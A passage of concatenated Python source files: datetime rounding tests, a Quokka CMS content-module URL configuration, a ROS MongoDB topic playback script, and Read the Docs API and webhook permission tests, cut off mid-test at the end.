timedelta(days=1),
datetime(2012, 12, 31),
),
(
datetime(2012, 12, 31, 11),
timedelta(days=1),
datetime(2012, 12, 31),
),
(
datetime(2012, 12, 31, 13, tzinfo=NEW_YORK),
timedelta(days=1),
datetime(2012, 12, 31, tzinfo=NEW_YORK),
),
(
datetime(2012, 12, 31, 12, tzinfo=NEW_YORK),
timedelta(days=1),
datetime(2012, 12, 31, tzinfo=NEW_YORK),
),
(
datetime(2012, 12, 31, 11, tzinfo=NEW_YORK),
timedelta(days=1),
datetime(2012, 12, 31, tzinfo=NEW_YORK),
),
],
)
def test_floor_datetime(dt, nearest, expected):
assert floor_datetime(dt, nearest) == expected
@pytest.mark.parametrize(
"dt,nearest,expected",
[
(
datetime(2012, 12, 31, 23, 59, 31, 999999),
timedelta(minutes=1),
datetime(2013, 1, 1),
),
(
datetime(2012, 12, 31, 23, 59, 31),
timedelta(minutes=1),
datetime(2013, 1, 1),
),
(
datetime(2012, 12, 31, 23, 59, 30),
timedelta(minutes=1),
datetime(2013, 1, 1),
),
(
datetime(2012, 12, 31, 23, 59, 29),
timedelta(minutes=1),
datetime(2012, 12, 31, 23, 59),
),
(
datetime(2012, 12, 31, 23, 59, 31, tzinfo=NEW_YORK),
timedelta(minutes=1),
datetime(2013, 1, 1, tzinfo=NEW_YORK),
),
(
datetime(2012, 12, 31, 23, 59, 30, tzinfo=NEW_YORK),
timedelta(minutes=1),
datetime(2013, 1, 1, tzinfo=NEW_YORK),
),
(
datetime(2012, 12, 31, 23, 59, 29, tzinfo=NEW_YORK),
timedelta(minutes=1),
datetime(2012, 12, 31, 23, 59, tzinfo=NEW_YORK),
),
(
datetime(2012, 12, 31, 23, 31),
timedelta(hours=1),
datetime(2013, 1, 1),
),
(
datetime(2012, 12, 31, 23, 30),
timedelta(hours=1),
datetime(2013, 1, 1),
),
(
datetime(2012, 12, 31, 23, 29),
timedelta(hours=1),
datetime(2012, 12, 31, 23),
),
(
datetime(2012, 12, 31, 23, 31, tzinfo=NEW_YORK),
timedelta(hours=1),
datetime(2013, 1, 1, tzinfo=NEW_YORK),
),
(
datetime(2012, 12, 31, 23, 30, tzinfo=NEW_YORK),
timedelta(hours=1),
datetime(2013, 1, 1, tzinfo=NEW_YORK),
),
(
datetime(2012, 12, 31, 23, 29, tzinfo=NEW_YORK),
timedelta(hours=1),
datetime(2012, 12, 31, 23, tzinfo=NEW_YORK),
),
(datetime(2012, 12, 31, 13), timedelta(days=1), datetime(2013, 1, 1)),
(datetime(2012, 12, 31, 12), timedelta(days=1), datetime(2013, 1, 1)),
(
datetime(2012, 12, 31, 11),
timedelta(days=1),
datetime(2012, 12, 31),
),
(
datetime(2012, 12, 31, 13, tzinfo=NEW_YORK),
timedelta(days=1),
datetime(2013, 1, 1, tzinfo=NEW_YORK),
),
(
datetime(2012, 12, 31, 12, tzinfo=NEW_YORK),
timedelta(days=1),
datetime(2013, 1, 1, tzinfo=NEW_YORK),
),
(
datetime(2012, 12, 31, 11, tzinfo=NEW_YORK),
timedelta(days=1),
datetime(2012, 12, 31, tzinfo=NEW_YORK),
),
],
)
def test_round_datetime(dt, nearest, expected):
assert round_datetime(dt, nearest) == expected
| |
from quokka.core.app import QuokkaModule
from .admin import AdminArticlesView, AdminPagesView, AdminBlocksView
from .views import (
DetailView, PreviewView, ArticleListView, CategoryListView, TagListView,
AuthorListView
)
from .utils import url_for_content, strftime
def configure(app):
# Register admin views
app.admin.register(
app.db.index,
AdminArticlesView,
name='Articles',
endpoint='articleview'
)
app.admin.register(
app.db.index,
AdminPagesView,
name='Pages',
endpoint='pageview'
)
app.admin.register(
app.db.index,
AdminBlocksView,
name='Blocks',
endpoint='blockview',
category='Administration'
)
# Admin admin index panel icons
app.admin.add_icon(
endpoint='quokka.core.content.admin.articleview.create_view',
icon='glyphicon-edit',
text='New<br>Article'
)
app.admin.add_icon(
endpoint='quokka.core.content.admin.pageview.create_view',
icon='glyphicon-file',
text='New<br>Page'
)
app.admin.add_icon(
endpoint='quokka.core.content.admin.blockview.create_view',
icon='glyphicon-th-list',
text='New<br>Block'
)
# app.admin.add_icon(
# endpoint='quokka.core.content.admin.articleview.index_view',
# icon='glyphicon-list',
# text='All<br>Articles'
# )
# Register new commands
# Register content types
# Register content formats
# create new Quokka Module with its views
module = QuokkaModule(__name__)
ext = app.config.get("CONTENT_EXTENSION", "html")
extensions = list(app.config.get('CONTENT_EXTENSION_MAP', {}).keys())
ext_list = ','.join(extensions or ['html', 'htm', 'rss', 'atom'])
ext = f'<any({ext_list}):ext>'
# INDEX|HOME
# handle /
module.add_url_rule('/', view_func=ArticleListView.as_view('index'))
# handle /index.html
module.add_url_rule(f'/index.{ext}',
view_func=ArticleListView.as_view('indexnamed'))
# handle /2/
module.add_url_rule(f'/<int:page_number>/',
view_func=ArticleListView.as_view('indexpag'))
# handle /2.html
module.add_url_rule(f'/<int:page_number>.{ext}',
view_func=ArticleListView.as_view('indexpagext'))
# handle /2/index.html
module.add_url_rule(f'/<int:page_number>/index.{ext}',
view_func=ArticleListView.as_view('indexpagnamed'))
# USER
# handle /@authorname/
# handle /@authorname/2/
# handle /@authorname/index.html
# handle /@authorname/2.html
# handle /@authorname/2/index.html
# AUTHORS
# handle /authors/
module.add_url_rule(f'/authors/',
view_func=AuthorListView.as_view('authors'))
# handle /authors/index.html
module.add_url_rule(f'/authors/index.{ext}',
view_func=AuthorListView.as_view('authorsnamed'))
# AUTHOR
# handle /author/name/
module.add_url_rule('/author/<path:author>/',
view_func=ArticleListView.as_view('author'))
# handle /author/name/index.html
module.add_url_rule(f'/author/<path:author>/index.{ext}',
view_func=ArticleListView.as_view('authornamed'))
# handle /author/name/2
module.add_url_rule('/author/<path:author>/<int:page_number>/',
view_func=ArticleListView.as_view('authorpag'))
# handle /author/name/2.html
module.add_url_rule(f'/author/<path:author>/<int:page_number>.{ext}',
view_func=ArticleListView.as_view('authorpagext'))
# handle /author/name/2/index.html
module.add_url_rule(f'/author/<path:author>/<int:page_number>/index.{ext}',
view_func=ArticleListView.as_view('authorpagnamed'))
# TAGS
# handle /tags/
module.add_url_rule(f'/tags/',
view_func=TagListView.as_view('tags'))
# handle /tags/index.html
module.add_url_rule(f'/tags/index.{ext}',
view_func=TagListView.as_view('tagsnamed'))
# TAG
# handle /tag/tagname/
module.add_url_rule('/tag/<string:tag>/',
view_func=ArticleListView.as_view('tag'))
# handle /tag/tagname/index.html
module.add_url_rule(f'/tag/<string:tag>/index.{ext}',
view_func=ArticleListView.as_view('tagnamed'))
# handle /tag/tagname/2/
module.add_url_rule('/tag/<string:tag>/<int:page_number>/',
view_func=ArticleListView.as_view('tagpag'))
# handle /tag/tagname/2.html
module.add_url_rule(f'/tag/<string:tag>/<int:page_number>.{ext}',
view_func=ArticleListView.as_view('tagpagext'))
# handle /tag/tagname/2/index.html
module.add_url_rule(f'/tag/<string:tag>/<int:page_number>/index.{ext}',
view_func=ArticleListView.as_view('tagpagnamed'))
# BLOCKS
# handle /block/slug.html
module.add_url_rule('/block/<string:block>/',
view_func=ArticleListView.as_view('block'))
# handle /block/blockname/index.html
module.add_url_rule(f'/block/<string:block>/index.{ext}',
view_func=ArticleListView.as_view('blocknamed'))
# handle /block/blockname/2/
module.add_url_rule('/block/<string:block>/<int:page_number>/',
view_func=ArticleListView.as_view('blockpag'))
# handle /block/blockname/2.html
module.add_url_rule(f'/block/<string:block>/<int:page_number>.{ext}',
view_func=ArticleListView.as_view('blockpagext'))
# handle /block/blockname/2/index.html
module.add_url_rule(f'/block/<string:block>/<int:page_number>/index.{ext}',
view_func=ArticleListView.as_view('blockpagnamed'))
# CATEGORIES
# handle /categories/
module.add_url_rule(f'/categories/',
view_func=CategoryListView.as_view('categories'))
# handle /categories/index.html
module.add_url_rule(f'/categories/index.{ext}',
view_func=CategoryListView.as_view('categoriesnamed'))
# CATEGORY
# handle /blog/subcategory/
module.add_url_rule('/<path:category>/',
view_func=ArticleListView.as_view('cat'))
# handle /blog/subcategory/index.html
module.add_url_rule(f'/<path:category>/index.{ext}',
view_func=ArticleListView.as_view('catnamed'))
# handle /blog/subcategory/2/
module.add_url_rule(f'/<path:category>/<int:page_number>/',
view_func=ArticleListView.as_view('catpag'))
# handle /blog/subcategory/2.html
module.add_url_rule(f'/<path:category>/<int:page_number>.{ext}',
view_func=ArticleListView.as_view('catpagext'))
# handle /blog/subcategory/2/index.html
module.add_url_rule(f'/<path:category>/<int:page_number>/index.{ext}',
view_func=ArticleListView.as_view('catpagnamed'))
# ARTICLE|PAGE
# handle /article-name.html and /foo/bar/article-name.html
module.add_url_rule(f'/<path:slug>.{ext}',
view_func=DetailView.as_view('detail'))
# handle the .preview of drafts
module.add_url_rule('/<path:slug>.preview',
view_func=PreviewView.as_view('preview'))
# add template globals to app
app.add_template_global(url_for_content)
app.add_template_filter(strftime)
# add context processors
@module.context_processor
def theme_context():
return {
'FOO': 'BAR'
}
# register the module
app.register_module(module)
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import rospy
import mongodb_store.util as mg_util
import sys
import time
import pymongo
from multiprocessing import Process
import calendar
import datetime
import threading
import multiprocessing
from rosgraph_msgs.msg import Clock
import signal
import Queue
from optparse import OptionParser
MongoClient = mg_util.import_MongoClient()
TIME_KEY = '_meta.inserted_at'
def max_time(collection):
return collection.find_one(sort=[(TIME_KEY, pymongo.DESCENDING)])['_meta']['inserted_at']
def min_time(collection):
return collection.find_one(sort=[(TIME_KEY, pymongo.ASCENDING)])['_meta']['inserted_at']
def to_ros_time(dt):
return rospy.Time(calendar.timegm(dt.utctimetuple()), dt.microsecond * 1000)
def to_datetime(rt):
return datetime.datetime.utcfromtimestamp(rt.secs) + datetime.timedelta(microseconds = rt.nsecs / 1000)
def ros_time_strftime(rt, format):
""" converts a ros time to a datetime and calls strftime on it with the given format """
return to_datetime(rt).strftime(format)
def mkdatetime(date_string):
return datetime.datetime.strptime(date_string, '%d/%m/%y %H:%M')
class PlayerProcess(object):
def __init__(self, event, start_time, end_time):
super(PlayerProcess, self).__init__()
self.event = event
self.start_time = start_time
self.end_time = end_time
self.running = multiprocessing.Value('b', True)
self.player_process = multiprocessing.Process(target=self.run, args=[self.running])
def start(self):
self.player_process.start()
def stop(self):
self.running.value = False
def join(self):
self.player_process.join()
def is_running(self):
return self.running.value
class TopicPlayer(PlayerProcess):
""" """
def __init__(self, mongodb_host, mongodb_port, db_name, collection_name, event, start_time, end_time):
super(TopicPlayer, self).__init__(event, start_time, end_time)
self.mongodb_host = mongodb_host
self.mongodb_port = mongodb_port
self.db_name = db_name
self.collection_name = collection_name
def init(self, running):
""" Called in subprocess to do process-specific initialisation """
rospy.init_node("mongodb_playback_%s" % self.collection_name)
# clear signal handlers in this child process, rospy will handle signals for us
signal.signal(signal.SIGTERM, signal.SIG_DFL)
signal.signal(signal.SIGINT, signal.SIG_DFL)
self.mongo_client=MongoClient(self.mongodb_host, self.mongodb_port)
self.collection = self.mongo_client[self.db_name][self.collection_name]
# two threads running here, the main one does the publishing
# the second one populates the qeue of things to publish
# how many to
buffer_size = 50
self.to_publish = Queue.Queue(maxsize=buffer_size)
self.queue_thread = threading.Thread(target=self.queue_from_db, args=[running])
self.queue_thread.start()
def queue_from_db(self, running):
# make sure there's an index on time in the collection so the sort operation doesn't require the whole collection to be loaded
self.collection.ensure_index(TIME_KEY)
# get all documents within the time window, sorted ascending order by time
documents = self.collection.find({TIME_KEY: { '$gte': to_datetime(self.start_time), '$lte': to_datetime(self.end_time)}}, sort=[(TIME_KEY, pymongo.ASCENDING)])
if documents.count() == 0:
rospy.logwarn('No messages to play back from topic %s' % self.collection_name)
return
else:
rospy.logdebug('Playing back %d messages', documents.count())
# load message class for this collection, they should all be the same
msg_cls = mg_util.load_class(documents[0]["_meta"]["stored_class"])
latch = False
if "latch" in documents[0]["_meta"]:
latch = documents[0]["_meta"]["latch"]
# publisher won't be used until something is on the queue, so it's safe to construct it here
self.publisher = rospy.Publisher(documents[0]["_meta"]["topic"], msg_cls, latch = latch, queue_size = 10)
for document in documents:
if running.value:
# instantiate the ROS message object from the dictionary retrieved from the db
message = mg_util.dictionary_to_message(document, msg_cls)
# print (message, document["_meta"]["inserted_at"])
# put will only work while there is space in the queue, if not it will block until another take is performed
self.to_publish.put((message, to_ros_time(document["_meta"]["inserted_at"])))
else:
break
rospy.logdebug('All messages queued for topic %s' % self.collection_name)
def run(self, running):
self.init(running)
# wait until sim clock has initialised
while rospy.get_rostime().secs == 0:
# can't use rospy time here as if clock is 0 it will wait forever
time.sleep(0.2)
rospy.logdebug('Topic playback ready %s %s' % (self.collection.name, rospy.get_param('use_sim_time')))
# wait for the signal to start
self.event.wait()
timeout = 1
while running.value:
try:
msg_time_tuple = self.to_publish.get(timeout=timeout)
publish_time = msg_time_tuple[1]
msg = msg_time_tuple[0]
now = rospy.get_rostime()
# if we've missed our window
if publish_time < now:
rospy.logwarn('Message out of sync by %f', (now - publish_time).to_sec())
else:
delay = publish_time - now
rospy.sleep(delay)
# rospy.loginfo('diff %f' % (publish_time - rospy.get_rostime()).to_sec())
self.publisher.publish(msg)
except Queue.Empty, e:
pass
self.queue_thread.join()
self.mongo_client.close()
rospy.loginfo('Topic playback finished %s' % self.collection.name)
class ClockPlayer(PlayerProcess):
""" Plays a clock message in a separate thread"""
def __init__(self, event, start_time, end_time, pre_roll = rospy.Duration(0), post_roll = rospy.Duration(0)):
super(ClockPlayer, self).__init__(event, start_time, end_time)
self.start_time = start_time
self.end_time = end_time
self.pre_roll = pre_roll
self.post_roll = post_roll
def init(self):
# we handle shutdown for this process
signal.signal(signal.SIGTERM, signal.SIG_DFL)
signal.signal(signal.SIGINT, signal.SIG_DFL)
# make sure this node doesn't use sim time
rospy.set_param('use_sim_time', False)
rospy.init_node('mongodb_playback_clock_player')
# switch to simulated time, note that as this is after the init_node, this node DOES NOT use sim time
rospy.set_param('use_sim_time', True)
# topic to public clock on
self.clock_pub = rospy.Publisher('/clock', Clock, queue_size=1)
# send the first message to get time off 0
self.clock_pub.publish(Clock(clock=(self.start_time - self.pre_roll)))
# notify everyone else that they can move on
self.event.set()
def run(self, running):
self.init()
start = self.start_time - self.pre_roll
end = self.end_time + self.post_roll
# start value
clock_msg = Clock(clock=start)
# timing details, should be moved to constructor parameters
updates_hz = 1000.0
rate = rospy.Rate(updates_hz)
# this assumes close to real-time playback
update = rospy.Duration(1.0 / updates_hz)
# wait for the signal to start
self.event.wait()
while running.value and clock_msg.clock <= end:
# update time
clock_msg.clock += update
# publish time
self.clock_pub.publish(clock_msg)
rate.sleep()
rospy.logdebug('Playback clock finished')
running.value = False
class MongoPlayback(object):
""" Plays back stored topics from the mongodb_store """
def __init__(self):
super(MongoPlayback, self).__init__()
self.mongodb_host = rospy.get_param("mongodb_host")
self.mongodb_port = rospy.get_param("mongodb_port")
self.mongo_client=MongoClient(self.mongodb_host, self.mongodb_port)
self.stop_called = False
def setup(self, database_name, req_topics, start_dt, end_dt):
""" Read in details of requested playback collections. """
if database_name not in self.mongo_client.database_names():
raise Exception('Unknown database %s' % database_name)
database = self.mongo_client[database_name]
collection_names = database.collection_names(include_system_collections=False)
req_topics = set(map(mg_util.topic_name_to_collection_name, req_topics))
if len(req_topics) > 0:
topics = req_topics.intersection(collection_names)
dropped = req_topics.difference(topics)
if(len(dropped) > 0):
print('WARNING Dropped non-existant requested topics for playback: %s' % dropped)
else:
topics = set(collection_names)
print('Playing back topics %s' % topics)
# create mongo collections
collections = [database[collection_name] for collection_name in topics]
# make sure they're easily accessible by time
for collection in collections:
collection.ensure_index(TIME_KEY)
if len(start_dt)==0:
# get the min and max time across all collections, conver to ros time
start_time = to_ros_time(min(map(min_time, [collection for collection in collections if collection.count() > 0])))
else:
start_time = to_ros_time(mkdatetime(start_dt))
if len(end_dt)==0:
end_time = to_ros_time(max(map(max_time, [collection for collection in collections if collection.count() > 0])))
else:
end_time = to_ros_time(mkdatetime(end_dt))
# we don't need a connection any more
self.mongo_client.close()
# rospy.loginfo('Playing back from %s' % to_datetime(start_time))
# rospy.loginfo('.............. to %s' % to_datetime(end_time))
self.event = multiprocessing.Event()
# create clock thread
pre_roll = rospy.Duration(2)
post_roll = rospy.Duration(0)
self.clock_player = ClockPlayer(self.event, start_time, end_time, pre_roll, post_roll)
# create playback objects
self.players = map(lambda c: TopicPlayer(self.mongodb_host, self.mongodb_port, database_name, c, self.event, start_time - pre_roll, end_time + post_roll), topics)
def start(self):
self.clock_player.start()
# wait until clock has set sim time
self.event.wait()
self.event.clear()
# this creates new processes and publishers for each topic
for player in self.players:
player.start()
# all players wait for this before starting --
# todo: it could happen that his gets hit before all are constructed though
self.event.set()
def join(self):
self.clock_player.join()
# if clock runs out but we weren't killed then we need ot stop other processes
if not self.stop_called:
self.stop()
for player in self.players:
player.join()
def stop(self):
self.stop_called = True
self.clock_player.stop()
for player in self.players:
player.stop()
def is_running(self):
return self.clock_player.is_running()
def main(argv):
myargv = rospy.myargv(argv=argv)
parser = OptionParser()
parser.usage += " [TOPICs...]"
parser.add_option("--mongodb-name", dest="mongodb_name",
help="Name of DB from which to retrieve values",
metavar="NAME", default="roslog")
parser.add_option("-s", "--start", dest="start", type="string", default="", metavar='S', help='start datetime of query, defaults to the earliest date stored in db, across all requested collections. Formatted "d/m/y H:M" e.g. "06/07/14 06:38"')
parser.add_option("-e", "--end", dest="end", type="string", default="", metavar='E', help='end datetime of query, defaults to the latest date stored in db, across all requested collections. Formatted "d/m/y H:M" e.g. "06/07/14 06:38"')
(options, args) = parser.parse_args(myargv)
database_name = options.mongodb_name
topics = set(args[1:])
playback = MongoPlayback()
def signal_handler(signal, frame):
playback.stop()
signal.signal(signal.SIGTERM, signal_handler)
signal.signal(signal.SIGINT, signal_handler)
playback.setup(database_name, topics, options.start, options.end)
playback.start()
playback.join()
rospy.set_param('use_sim_time', False)
# processes load main so move init_node out
if __name__ == "__main__":
main(sys.argv)
| |
from __future__ import absolute_import
import json
import base64
import datetime
import mock
from builtins import str
from django.test import TestCase
from django.contrib.auth.models import User
from django_dynamic_fixture import get
from rest_framework import status
from rest_framework.test import APIClient
from allauth.socialaccount.models import SocialAccount
from readthedocs.builds.models import Build, Version
from readthedocs.integrations.models import Integration
from readthedocs.projects.models import Project, Feature
from readthedocs.oauth.models import RemoteRepository, RemoteOrganization
super_auth = base64.b64encode(b'super:test').decode('utf-8')
eric_auth = base64.b64encode(b'eric:test').decode('utf-8')
class APIBuildTests(TestCase):
fixtures = ['eric.json', 'test_data.json']
def test_make_build(self):
"""
Test that a superuser can use the API
"""
client = APIClient()
client.login(username='super', password='test')
resp = client.post(
'/api/v2/build/',
{
'project': 1,
'version': 1,
'success': True,
'output': 'Test Output',
'error': 'Test Error',
'state': 'cloning',
},
format='json')
self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
build = resp.data
self.assertEqual(build['state_display'], 'Cloning')
resp = client.get('/api/v2/build/%s/' % build['id'])
self.assertEqual(resp.status_code, 200)
build = resp.data
self.assertEqual(build['output'], 'Test Output')
self.assertEqual(build['state_display'], 'Cloning')
def test_make_build_without_permission(self):
"""Ensure anonymous/non-staff users cannot write the build endpoint"""
client = APIClient()
def _try_post():
resp = client.post(
'/api/v2/build/',
{
'project': 1,
'version': 1,
'success': True,
'output': 'Test Output',
'error': 'Test Error',
},
format='json')
self.assertEqual(resp.status_code, 403)
_try_post()
api_user = get(User, staff=False, password='test')
assert api_user.is_staff is False
client.force_authenticate(user=api_user)
_try_post()
def test_update_build_without_permission(self):
"""Ensure anonymous/non-staff users cannot update build endpoints"""
client = APIClient()
api_user = get(User, staff=False, password='test')
client.force_authenticate(user=api_user)
build = get(Build, project_id=1, version_id=1, state='cloning')
resp = client.put(
'/api/v2/build/{0}/'.format(build.pk),
{
'project': 1,
'version': 1,
'state': 'finished'
},
format='json')
self.assertEqual(resp.status_code, 403)
def test_make_build_protected_fields(self):
"""Ensure build api view delegates correct serializer
Super users should be able to read/write the `builder` property, but we
don't expose this to end users via the API
"""
build = get(Build, project_id=1, version_id=1, builder='foo')
client = APIClient()
api_user = get(User, staff=False, password='test')
client.force_authenticate(user=api_user)
resp = client.get('/api/v2/build/{0}/'.format(build.pk), format='json')
self.assertEqual(resp.status_code, 200)
client.force_authenticate(user=User.objects.get(username='super'))
resp = client.get('/api/v2/build/{0}/'.format(build.pk), format='json')
self.assertEqual(resp.status_code, 200)
self.assertIn('builder', resp.data)
def test_make_build_commands(self):
"""Create build and build commands"""
client = APIClient()
client.login(username='super', password='test')
resp = client.post(
'/api/v2/build/',
{
'project': 1,
'version': 1,
'success': True,
},
format='json')
self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
build = resp.data
now = datetime.datetime.utcnow()
resp = client.post(
'/api/v2/command/',
{
'build': build['id'],
'command': 'echo test',
'description': 'foo',
'exit_code': 0,
'start_time': str(now - datetime.timedelta(seconds=5)),
'end_time': str(now),
},
format='json')
self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
resp = client.get('/api/v2/build/%s/' % build['id'])
self.assertEqual(resp.status_code, 200)
build = resp.data
self.assertEqual(len(build['commands']), 1)
self.assertEqual(build['commands'][0]['run_time'], 5)
self.assertEqual(build['commands'][0]['description'], 'foo')
class APITests(TestCase):
fixtures = ['eric.json', 'test_data.json']
def test_make_project(self):
"""
Test that a superuser can use the API
"""
post_data = {"name": "awesome-project",
"repo": "https://github.com/ericholscher/django-kong.git"}
resp = self.client.post('/api/v1/project/',
data=json.dumps(post_data),
content_type='application/json',
HTTP_AUTHORIZATION=u'Basic %s' % super_auth)
self.assertEqual(resp.status_code, 201)
self.assertEqual(resp['location'],
'/api/v1/project/24/')
resp = self.client.get('/api/v1/project/24/', data={'format': 'json'},
HTTP_AUTHORIZATION=u'Basic %s' % eric_auth)
self.assertEqual(resp.status_code, 200)
obj = json.loads(resp.content)
self.assertEqual(obj['slug'], 'awesome-project')
def test_user_doesnt_get_full_api_return(self):
user_normal = get(User, is_staff=False)
user_admin = get(User, is_staff=True)
project = get(Project, main_language_project=None, conf_py_file='foo')
client = APIClient()
client.force_authenticate(user=user_normal)
resp = client.get('/api/v2/project/%s/' % (project.pk))
self.assertEqual(resp.status_code, 200)
self.assertNotIn('conf_py_file', resp.data)
client.force_authenticate(user=user_admin)
resp = client.get('/api/v2/project/%s/' % (project.pk))
self.assertEqual(resp.status_code, 200)
self.assertIn('conf_py_file', resp.data)
self.assertEqual(resp.data['conf_py_file'], 'foo')
def test_invalid_make_project(self):
"""
Test that the authentication is turned on.
"""
post_data = {"user": "/api/v1/user/2/",
"name": "awesome-project-2",
"repo": "https://github.com/ericholscher/django-bob.git"
}
resp = self.client.post(
'/api/v1/project/', data=json.dumps(post_data),
content_type='application/json',
HTTP_AUTHORIZATION=u'Basic %s' % base64.b64encode(b'tester:notapass').decode('utf-8')
)
self.assertEqual(resp.status_code, 401)
def test_make_project_dishonest_user(self):
"""
Test that you can't create a project for another user
"""
# represents dishonest data input, authentication happens for user 2
post_data = {
"users": ["/api/v1/user/1/"],
"name": "awesome-project-2",
"repo": "https://github.com/ericholscher/django-bob.git"
}
resp = self.client.post(
'/api/v1/project/',
data=json.dumps(post_data),
content_type='application/json',
HTTP_AUTHORIZATION=u'Basic %s' % base64.b64encode(b'tester:test').decode('utf-8')
)
self.assertEqual(resp.status_code, 401)
def test_ensure_get_unauth(self):
"""
Test that GET requests work without authenticating.
"""
resp = self.client.get("/api/v1/project/", data={"format": "json"})
self.assertEqual(resp.status_code, 200)
def test_project_features(self):
user = get(User, is_staff=True)
project = get(Project, main_language_project=None)
# One explicit, one implicit feature
feature1 = get(Feature, projects=[project])
feature2 = get(Feature, projects=[], default_true=True)
feature3 = get(Feature, projects=[], default_true=False)
client = APIClient()
client.force_authenticate(user=user)
resp = client.get('/api/v2/project/%s/' % (project.pk))
self.assertEqual(resp.status_code, 200)
self.assertIn('features', resp.data)
self.assertEqual(
resp.data['features'],
[feature1.feature_id, feature2.feature_id]
)
def test_project_features_multiple_projects(self):
user = get(User, is_staff=True)
project1 = get(Project, main_language_project=None)
project2 = get(Project, main_language_project=None)
feature = get(Feature, projects=[project1, project2], default_true=True)
client = APIClient()
client.force_authenticate(user=user)
resp = client.get('/api/v2/project/%s/' % (project1.pk))
self.assertEqual(resp.status_code, 200)
self.assertIn('features', resp.data)
self.assertEqual(
resp.data['features'],
[feature.feature_id]
)
class APIImportTests(TestCase):
"""Import API endpoint tests"""
fixtures = ['eric.json', 'test_data.json']
def test_permissions(self):
"""Ensure user repositories aren't leaked to other users"""
client = APIClient()
account_a = get(SocialAccount, provider='github')
account_b = get(SocialAccount, provider='github')
account_c = get(SocialAccount, provider='github')
user_a = get(User, password='test', socialaccount_set=[account_a])
user_b = get(User, password='test', socialaccount_set=[account_b])
user_c = get(User, password='test', socialaccount_set=[account_c])
org_a = get(RemoteOrganization, users=[user_a], account=account_a)
repo_a = get(RemoteRepository, users=[user_a], organization=org_a,
account=account_a)
repo_b = get(RemoteRepository, users=[user_b], organization=None,
account=account_b)
client.force_authenticate(user=user_a)
resp = client.get(
'/api/v2/remote/repo/',
format='json')
self.assertEqual(resp.status_code, status.HTTP_200_OK)
repos = resp.data['results']
self.assertEqual(repos[0]['id'], repo_a.id)
self.assertEqual(repos[0]['organization']['id'], org_a.id)
self.assertEqual(len(repos), 1)
resp = client.get(
'/api/v2/remote/org/',
format='json')
self.assertEqual(resp.status_code, status.HTTP_200_OK)
orgs = resp.data['results']
self.assertEqual(orgs[0]['id'], org_a.id)
self.assertEqual(len(orgs), 1)
client.force_authenticate(user=user_b)
resp = client.get(
'/api/v2/remote/repo/',
format='json')
self.assertEqual(resp.status_code, status.HTTP_200_OK)
repos = resp.data['results']
self.assertEqual(repos[0]['id'], repo_b.id)
self.assertEqual(repos[0]['organization'], None)
self.assertEqual(len(repos), 1)
client.force_authenticate(user=user_c)
resp = client.get(
'/api/v2/remote/repo/',
format='json')
self.assertEqual(resp.status_code, status.HTTP_200_OK)
repos = resp.data['results']
self.assertEqual(len(repos), 0)
@mock.patch('readthedocs.core.views.hooks.trigger_build')
class IntegrationsTests(TestCase):
"""Integration for webhooks, etc"""
fixtures = ['eric.json', 'test_data.json']
def setUp(self):
self.project = get(Project)
self.version = get(Version, verbose_name='master', project=self.project)
def test_github_webhook(self, trigger_build):
"""GitHub webhook API"""
client = APIClient()
resp = client.post(
'/api/v2/webhook/github/{0}/'.format(self.project.slug),
{'ref': 'master'},
format='json',
)
trigger_build.assert_has_calls([
mock.call(force=True, version=mock.ANY, project=self.project)
])
resp = client.post(
'/api/v2/webhook/github/{0}/'.format(self.project.slug),
{'ref': 'non-existent'},
format='json',
)
trigger_build.assert_has_calls([
mock.call(force=True, version=mock.ANY, project=self.project)
])
def test_github_invalid_webhook(self, trigger_build):
"""GitHub webhook unhandled event"""
client = APIClient()
resp = client.post(
'/api/v2/webhook/github/{0}/'.format(self.project.slug),
{'foo': 'bar'},
format='json',
HTTP_X_GITHUB_EVENT='pull_request',
)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data['detail'], 'Unhandled webhook event')
def test_gitlab_webhook(self, trigger_build):
"""GitLab webhook API"""
client = APIClient()
resp = client.post(
'/api/v2/webhook/gitlab/{0}/'.format(self.project.slug),
{'object_kind': 'push', 'ref': 'master'},
format='json',
)
trigger_build.assert_has_calls([
mock.call(force=True, version=mock.ANY, project=self.project)
])
resp = client.post(
'/api/v2/webhook/gitlab/{0}/'.format(self.project.slug),
{'object_kind': 'push', 'ref': 'non-existent'},
format='json',
)
trigger_build.assert_has_calls([
mock.call(force=True, version=mock.ANY, project=self.project)
])
def test_gitlab_invalid_webhook(self, trigger_build):
"""GitLab webhook unhandled event"""
client = APIClient()
resp = client.post(
'/api/v2/webhook/gitlab/{0}/'.format(self.project.slug),
{'object_kind': 'pull_request'},
format='json',
)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data['detail'], 'Unhandled webhook event')
def test_bitbucket_webhook(self, trigger_build):
"""Bitbucket webhook API"""
client = APIClient()
resp = client.post(
'/api/v2/webhook/bitbucket/{0}/'.format(self.project.slug),
{
'push': {
'changes': [{
'new': {
'name': 'master'
}
}]
}
},
format='json',
)
trigger_build.assert_has_calls([
mock.call(force=True, version=mock.ANY, project=self.project)
])
resp = client.post(
'/api/v2/webhook/bitbucket/{0}/'.format(self.project.slug),
{
'push': {
'changes': [{
'new': {
'name': 'non-existent'
}
}]
}
},
format='json',
)
trigger_build.assert_has_calls([
mock.call(force=True, version=mock.ANY, project=self.project)
])
def test_bitbucket_invalid_webhook(self, trigger_build):
"""Bitbucket webhook unhandled event"""
client = APIClient()
resp = client.post(
'/api/v2/webhook/bitbucket/{0}/'.format(self.project.slug),
{'foo': 'bar'},
format='json',
HTTP_X_EVENT_KEY='pull_request'
)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data['detail'], 'Unhandled webhook event')
def test_generic_api_fails_without_auth(self, trigger_build):
client = APIClient()
resp = client.post(
'/api/v2/webhook/generic/{0}/'.format(self.project.slug),
{},
format='json',
)
self.assertEqual(resp.status_code, 403)
self.assertEqual(
resp.data['detail'],
'Authentication credentials were not provided.'
)
def test_generic_api_respects_token_auth(self, trigger_build):
client = APIClient()
integration = Integration.objects.create(
project=self.project,
integration_type=Integration.API_WEBHOOK
)
self.assertIsNotNone(integration.token)
resp = client.post(
'/api/v2/webhook/{0}/{1}/'.format(self.project.slug, integration.pk),
{'token': integration.token},
format='json',
)
self.assertEqual(resp.status_code, 200)
self.assertTrue(resp.data['build_triggered'])
# Test nonexistent branch
resp = client.post(
'/api/v2/webhook/{0}/{1}/'.format(self.project.slug, integration.pk),
{'token': integration.token, 'branches': 'nonexistent'},
